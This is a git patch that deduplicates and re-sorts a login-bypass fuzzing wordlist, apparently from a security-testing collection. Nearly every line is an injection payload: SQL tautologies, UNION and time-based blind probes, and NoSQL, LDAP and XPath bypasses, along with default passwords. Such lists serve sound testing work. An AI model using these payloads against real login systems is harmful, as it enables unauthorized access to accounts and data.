From fef579420a0bb66ad61bf6365535ec8df81ccbde Mon Sep 17 00:00:00 2001
From: ItsIgnacioPortal <5990@protonmail.com>
Date: Thu, 27 Nov 2025 22:16:50 -0300
Subject: [PATCH] chore(wordlist): Removed duplicates from login_bypass.txt

---
 Fuzzing/login_bypass.txt | 1732 +++++++++++++++++++-------------------
 1 file changed, 864 insertions(+), 868 deletions(-)

diff --git a/Fuzzing/login_bypass.txt b/Fuzzing/login_bypass.txt
index bc1b8481..971359d4 100644
--- a/Fuzzing/login_bypass.txt
+++ b/Fuzzing/login_bypass.txt
@@ -1,901 +1,897 @@
-admin%
-%admin
-%admin%
-_admin
-admin_
-a_min
-a%min
-aaaaaaaaaaaaaaaa
-admin00000000000
-adminxxxxxxxxxxx
-admin\x00\x00\x00\x00
-admin%20
-admin%09
-admin%0a
-admin%0d
-admin+
-admin%2b
-%20admin
-%09admin%20
-\u0061dmin
-\u0070assword
-ad\u006din
-\u0041dmin
-\u0061\u0064\u006d\u0069\u006e
-\uFF41dmin
-%c0%61dmin
-%e0%80%61dmin
-admin%00
-admin\x00
-admin\0
-admin%00'--
-admin\x00'--
-admin%00"--
-admin%00' OR '1'='1
-admin\0' OR '1'='1
-password%00
-password\x00
-admin' AND SLEEP(5)--
-admin' AND SLEEP(10)#
-admin' AND BENCHMARK(1000000,MD5('test'))--
-admin' WAITFOR DELAY '0:0:5'--
-admin' WAITFOR DELAY '0:0:10'#
-admin' AND pg_sleep(5)--
-admin'; SELECT pg_sleep(10)--
-admin' UNION SELECT IF(1=1,SLEEP(5),0)--
-admin') AND SLEEP(5)--
-admin") AND SLEEP(5)--
-admin' AND 'x'<>'y
-admin' AND 1<2--
-admin' AND 2>1--
-admin' AND 3<>4#
-admin' AND EXISTS(SELECT * FROM users)--
-admin' AND NOT EXISTS(SELECT * FROM fake_table)--
-admin' AND LENGTH('a')=1--
-admin' AND ASCII('a')=97--
-admin') AND 'x'='x
-admin") AND "x"="x
-AdMiN
-ADMIN
-aDmIn
-AdMiN'--
-ADMIN'--
-aDmIn'#
-AdMiN"--
-ADMIN"--
-aDmIn"#
-AdMiN'oR'1'='1
-ADMIN'oR'1'='1
-admin
-password
-1234
-123456
-root
-toor
-test
-guest
-QNKCDZO
-aabg7XSs
-[$ne]=toto
-[$regex]=a.*
-{"$ne": null}
-{"$ne": "bar"}
-{"$gt": undefined}
-' or '1'='1
-' or ''='
-' or 1]%00
-' or /* or '
-' or "a" or '
-' or 1 or '
-' or true() or '
-'or string-length(name(.))<10 or'
-'or contains(name,'adm') or'
-'or contains(.,'adm') or'
-'or position()=2 or'
-admin' or '
-admin' or '1'='2
-*
-*)(&
-*)(|(&
-pwd)
-*)(|(*
-*))%00
-admin)(&)
-pwd
-admin)(!(&(|
-pwd))
-admin))(|(|
-1234
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
-or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
-' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
-" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
-and 1=1
-and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
-like '%'
-or 0=0 --
-or 0=0 #
-or 0=0 –
-' or         0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
-or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or a=a--
-' or a=a–
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-') or ('x'='x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
+
 "
-'-- 2
-"-- 2
-'='
-0'&lt;'2
-"="
-0"&lt;"2
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')&lt;('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")&lt;("2
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'&lt;'2'-- 2
-0'&lt;'2'#
-0'&lt;'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"&lt;"2"-- 2
-0"&lt;"2"#
-0"&lt;"2"/*
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')&lt;'2'-- 2
-0')&lt;'2'#
-0')&lt;'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")&lt;"2-- 2
-0")&lt;"2#
-0")&lt;"2/*
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-admin
-admin'-- 2
-admin'#
-admin"-- 2
-admin"#
-ffifdyop
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
+" "
+" #
+" --
+" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+" UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2`
 " UniON SElecT 1,2#
 " UniON SElecT 1,2,3#
 " UniON SElecT 1,2,3,4#
 " UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2-- 2
+" or "" "
+" or ""&"
+" or ""*"
+" or ""-"
+" or ""="
+" or ""^"
+" or "1"="1
+" or "1"="1"#
+" or "1"="1"--
+" or "1"="1"/*
+" or "a"="a
+" or "x"="x
+" or 0=0 #
+" or 0=0 --
+" or 0=0 –
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1#
+" or 1=1--
+" or 1=1/*
+" or 1=1–
+" or true--
+"&"
+"&""#
+"&""-- 2
+"&""/*
+")
+") #
 ") UniON SElecT 1,2#
 ") UniON SElecT 1,2,3#
 ") UniON SElecT 1,2,3,4#
 ") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2-- 2
+") or "1"="1
+") or "1"="1"#
+") or "1"="1"--
+") or "1"="1"/*
+") or ("1"="1
+") or ("1"="1"#
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("a"="a
+") or ("x")=("x
+") or true--
+")&""#
+")&""-- 2
+")&""/*
+")&("
+")) or (("x"))=(("x
+")*""#
+")*""-- 2
+")*""/*
+")*("
+")-""#
+")-""-- 2
+")-""/*
+")-("
+")-- 2
+")/*
+")=""#
+")=""-- 2
+")=""/*
+")=("
 ")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2)-- 2
 ")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3)-- 2
 ")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4)-- 2
 ")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")^""#
+")^""-- 2
+")^""/*
+")^("
+")oR 2 oR("
+")oR 2#
+")oR 2-- 2
+")oR 2/*
+")oR 2=2 oR("
+")oR 2=2#
+")oR 2=2-- 2
+")oR 2=2/*
+")oR true oR("
+")oR true#
+")oR true-- 2
+")oR true/*
+")oR"2"#
+")oR"2"-- 2
+")oR"2"/*
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1/*
+")oR"2"="2"#
+")oR"2"="2"-- 2
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR"2"=("2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR"2"LiKE("2
+")oR"2"oR("
+")oR("2
+")oR(2)#
+")oR(2)-- 2
+")oR(2)/*
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)/*
+")oR(2)=(2)oR("
+")oR(2)=2#
+")oR(2)=2-- 2
+")oR(2)=2/*
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+")oR(2)oR("
+")oR(true)#
+")oR(true)-- 2
+")oR(true)/*
+")oR(true)oR("
+")oR/**/2#
+")oR/**/2-- 2
+")oR/**/2/*
+")oR/**/2/**/oR("
+")oR/**/2=2#
+")oR/**/2=2-- 2
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR/**/true#
+")oR/**/true-- 2
+")oR/**/true/*
+")oR/**/true/**/oR("
 ")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
+")||"2"=("2
 ")||"2"LiKE"2"#
+")||"2"LiKE"2"-- 2
 ")||"2"LiKE"2"/*
 ")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
+")||"2"LiKE("2
+")||"2"||("
+")||("2
 ")||(2)LiKE(2)#
+")||(2)LiKE(2)-- 2
 ")||(2)LiKE(2)/*
 ")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
+")||2#
+")||2-- 2
+")||2/*
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)/*
+")||2=2#
+")||2=2-- 2
+")||2=2/*
+")||2=2||("
+")||2||("
+")||true#
+")||true-- 2
+")||true/*
+")||true||("
+"*"
+"*""#
+"*""-- 2
+"*""/*
+"-"
+"-""#
+"-""-- 2
+"-""/*
+"-- 2
+"/*
+";return(true);var xyz='a
+"="
+"=""#
+"=""-- 2
+"=""/*
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)#
+"UniON(SElecT(1),2,3,4,5)-- 2
+"^"
+"^""#
+"^""-- 2
+"^""/*
+"oR 2 oR"
+"oR 2#
+"oR 2-- 2
+"oR 2/*
+"oR 2=2 oR"
+"oR 2=2#
+"oR 2=2-- 2
+"oR 2=2/*
+"oR true oR"
+"oR true#
+"oR true-- 2
+"oR true/*
+"oR"2
+"oR"2"#
+"oR"2"-- 2
+"oR"2"/*
+"oR"2"="2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1/*
+"oR"2"="2"#
+"oR"2"="2"-- 2
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR"2"LiKE"2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR"2"oR"
+"oR(2)#
+"oR(2)-- 2
+"oR(2)/*
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)/*
+"oR(2)=(2)oR"
+"oR(2)=2#
+"oR(2)=2-- 2
+"oR(2)=2/*
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+"oR(2)oR"
+"oR(true)#
+"oR(true)-- 2
+"oR(true)/*
+"oR(true)oR"
+"oR/**/2#
+"oR/**/2-- 2
+"oR/**/2/*
+"oR/**/2/**/oR"
+"oR/**/2=2#
+"oR/**/2=2-- 2
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR/**/true#
+"oR/**/true-- 2
+"oR/**/true/*
+"oR/**/true/**/oR"
+"or 1=1 or ""="
+"||"2
+"||"2"="2
+"||"2"="2"||"
+"||"2"LiKE"2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||"2"||"
+"||(2)LiKE(2)#
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+"||2#
+"||2-- 2
+"||2/*
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)/*
+"||2=2#
+"||2=2-- 2
+"||2=2/*
+"||2=2||"
+"||2||"
+"||true#
+"||true-- 2
+"||true/*
+"||true||"
+$where: '1 == 1'
+%' or '0'='0
+%09admin%20
+%20admin
+%8C%A8%27 Or 1-- 2
+%8C%A8%27 Or 1=1-- 2
+%8C%A8%27) Or 1-- 2
+%8C%A8%27) Or 1=1-- 2
+%8C%A8%27)Or(1)-- 2
+%8C%A8%27)||1-- 2
+%8C%A8%27Or(1)-- 2
+%8C%A8%27||1-- 2
+%A8%27 Or 1-- 2
+%A8%27 Or 1=1-- 2
+%A8%27) Or 1-- 2
+%A8%27) Or 1=1-- 2
+%A8%27)Or(1)-- 2
+%A8%27)||1-- 2
+%A8%27Or(1)-- 2
+%A8%27||1-- 2
+%admin
+%admin%
+%bf' Or 1-- 2
+%bf' Or 1=1 -- 2
+%bf') Or 1-- 2
+%bf') Or 1=1 -- 2
+%bf')Or(1)-- 2
+%bf')||1-- 2
+%bf'Or(1)-- 2
+%bf'||1-- 2
+%c0%61dmin
+%e0%80%61dmin
+'
+' #
+' && this.password.match(/.*/)//+%00
+' && this.passwordzz.match(/.*/)//+%00
+' '
+' --
+' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+' OR 'x'='x'#;
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
 ' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2`
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2-- 2
+' and 'one'='one
+' and 'one'='one–
+' and 1='1
+' and a='a
+' and substring(password/text(),1,1)='7
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+' or         0=0 #
+' or "a" or '
+' or '' '
+' or ''&'
+' or ''*'
+' or ''-'
+' or ''='
+' or ''^'
+' or '1'='1
+' or '1'='1'#
+' or '1'='1'--
